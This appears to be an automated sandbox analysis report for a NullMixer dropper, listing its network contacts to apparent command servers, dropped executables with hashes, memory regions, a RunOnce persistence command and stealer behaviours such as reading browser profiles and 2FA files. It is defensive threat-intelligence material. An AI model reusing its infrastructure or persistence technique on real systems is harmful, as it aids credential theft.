SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 97a16c7e8ab8b16125957a42033e7047
SHA1 6a4830c58f1cda695bf43b40e152f28e611f9bff
SHA256 760ce585eb4dd375c916e4fae47e013090e8ca19b4abae149484dfa9b7761111
SHA512 2efc118a860b130c2ca6a1029b5dfac28abb1a6f7d0c67744638aa6cb9be32f40afa6e3dd79b9db916926bc7cf3fb9feea170f28dc54a7e35da49dc89206ab44

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe

MD5 25eb7c88cb3002c4029dd7e1aec7f63b
SHA1 cf1bf4283ee16d0a94fc65c82233f9eb69b1db70
SHA256 152b187c8a5d36e4b7f7728a0ac261294790f84b269b6e872ef24d966bcc5ca2
SHA512 f0c627bcb6774253e7c3689265ae30241cb77b45aa0adf0434bb26c173ac43dfd188a6ac7b36a152d1c145afe34a73ea3f765a9892eff0d7b96960d47c58137d

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1608-46-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1608-45-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1608-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1608-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-48-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-47-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

memory/1612-97-0x0000000000FB0000-0x0000000000FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/1864-106-0x0000000000B90000-0x0000000000BBC000-memory.dmp

memory/1864-107-0x0000000002B10000-0x0000000002B16000-memory.dmp

memory/2544-108-0x0000000000280000-0x000000000036E000-memory.dmp

memory/1864-111-0x0000000002B50000-0x0000000002B56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe

MD5 6cae1487c1ba88b65eead225c280d78c
SHA1 e2624ce9267706b64ee724abe6e7dc8e1dcafd32
SHA256 d3cd0b6963c1b88ff327eee0953c9e30ed3fe4ed7cc198a949b285b626c237d6
SHA512 7bc375e863cc33a7f9c7b24a4c050a73d74a6cc5002713ec1fc3eed8760a8883dd4c7b9f0f3e9c008a71d66b692c4ff8620d574b0f48c0ce531d8f0d4e8fa45a

memory/3608-116-0x0000000000250000-0x0000000000392000-memory.dmp

memory/3608-118-0x0000000004C70000-0x0000000004D02000-memory.dmp

memory/3608-119-0x0000000004C40000-0x0000000004C4A000-memory.dmp

memory/3608-117-0x0000000005320000-0x00000000058C4000-memory.dmp

memory/1864-109-0x0000000002B20000-0x0000000002B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe

MD5 7e51418ec90a49b4b6b3ce8e4ba26ba1
SHA1 9cc182ef14b4731d3c45930161afb0ee170d885c
SHA256 50c924e0f3b319b8f66278419f3c0dbd14c1c7d8d33e32d70ee1a959df30d4ae
SHA512 eadb844d9e570bc9339289a2dc4d5d76cc36ada19ff653af9e2a932d1aea083e33bebe65471637ff54e2ac8c36573bbcc243dd617d4391aef53a9fb184f41f7b

memory/3608-120-0x0000000004FB0000-0x000000000504C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/3756-132-0x0000000000730000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2460-141-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1608-167-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-169-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1608-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-164-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1608-160-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/1416-170-0x0000000000400000-0x0000000002C6E000-memory.dmp

memory/1608-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3608-175-0x0000000002520000-0x0000000002532000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/3708-188-0x0000000000D90000-0x0000000000DEA000-memory.dmp

memory/3928-189-0x0000000000630000-0x000000000070D000-memory.dmp

memory/3756-197-0x00000000010E0000-0x00000000010EE000-memory.dmp

memory/2448-199-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/3608-200-0x0000000008CB0000-0x0000000008D3C000-memory.dmp

memory/3608-201-0x00000000052F0000-0x000000000530E000-memory.dmp

memory/2460-202-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/2460-212-0x00000000056A0000-0x00000000056B2000-memory.dmp

memory/2460-211-0x0000000005C00000-0x0000000006218000-memory.dmp

memory/2460-213-0x0000000005740000-0x000000000577C000-memory.dmp

memory/4040-214-0x0000000002D40000-0x0000000002D76000-memory.dmp

memory/2460-215-0x0000000005780000-0x00000000057CC000-memory.dmp

memory/4040-216-0x0000000005750000-0x0000000005D78000-memory.dmp

memory/2460-220-0x00000000059F0000-0x0000000005AFA000-memory.dmp

memory/4040-219-0x0000000005EB0000-0x0000000005ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1einyrq0.bl2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4040-231-0x00000000060C0000-0x0000000006126000-memory.dmp

memory/4040-227-0x0000000005F50000-0x0000000005FB6000-memory.dmp

memory/4040-232-0x0000000006130000-0x0000000006484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS5CA2.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/4040-234-0x0000000006620000-0x000000000663E000-memory.dmp

memory/4040-237-0x0000000074510000-0x000000007455C000-memory.dmp

memory/4040-247-0x0000000006AC0000-0x0000000006ADE000-memory.dmp

memory/4040-248-0x00000000076B0000-0x0000000007753000-memory.dmp

memory/4040-236-0x0000000006AE0000-0x0000000006B12000-memory.dmp

memory/4040-250-0x0000000007FE0000-0x000000000865A000-memory.dmp

memory/4040-251-0x0000000007960000-0x000000000797A000-memory.dmp

memory/4040-252-0x00000000079C0000-0x00000000079CA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

memory/4040-258-0x0000000007BD0000-0x0000000007C66000-memory.dmp

memory/4040-259-0x0000000007B50000-0x0000000007B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

\??\pipe\LOCAL\crashpad_4860_MQULTQBAAVPCTOBR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d6b732916368ed54e8b34e6ed3d7868f
SHA1 da934d3c90ed0995335841243cda49c557b7791b
SHA256 8d0025a5073952cf5a3e7234c387c8e5d616af0a16bf61cc9bbb98fb1f81f1e1
SHA512 eadbc787e36e1bf7d80e8ce1216c41915b94bfaf7e62f89d9d49d0ee819ea39792af194e3f63be80dfa2789f2822296f85ffe4a24fef37767ec596f3c4a0a239

memory/4040-276-0x0000000007B80000-0x0000000007B8E000-memory.dmp

memory/4040-277-0x0000000007B90000-0x0000000007BA4000-memory.dmp

memory/4040-278-0x0000000007C90000-0x0000000007CAA000-memory.dmp

memory/4040-279-0x0000000007C70000-0x0000000007C78000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 448d0e6ecf61e761d9260e83354dd6c9
SHA1 0d6a8972378a11d9ab0cfb41866f8aad66597d55
SHA256 675be04a548f9ded9a2ff5c4da666b6504be9cf1cc8ae02bc32259c197c44a73
SHA512 d8d327b54cd108fa0924fe4f0ce1cf24f2de289a1475cbc35499976be9066940fef85066ad10002d1e62c12b80478e19fadfcc13ec689271fd5cbd483eed86d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 33892bbf8cc75ef069eb2e941faadea5
SHA1 367e3d87cc75ece568de3398f4d2378c2cfbae4a
SHA256 2d76000977bb6150b83dbb3a33a53d2ead887355b896b6a6715b753d9a6210da
SHA512 64bbf3391cd221c7b67b34bfe70ef7ac3380f5075e2eb652d6ed5f5e3f4f936e071c4186e20ca4fb176df52e70e9c514d4773ed085ec9e68bc5b08e86f02b30b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-07 09:15

Reported

2024-12-07 09:18

Platform

win7-20240729-en

Max time kernel

56s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\5d456d381f2e010.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4099E187\97c06d9b6fa6f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4099E187\0637ac7677d0cf7.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2268 set thread context of 1032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\f08378aa2c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS4099E187\17e6077dcf7a402.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
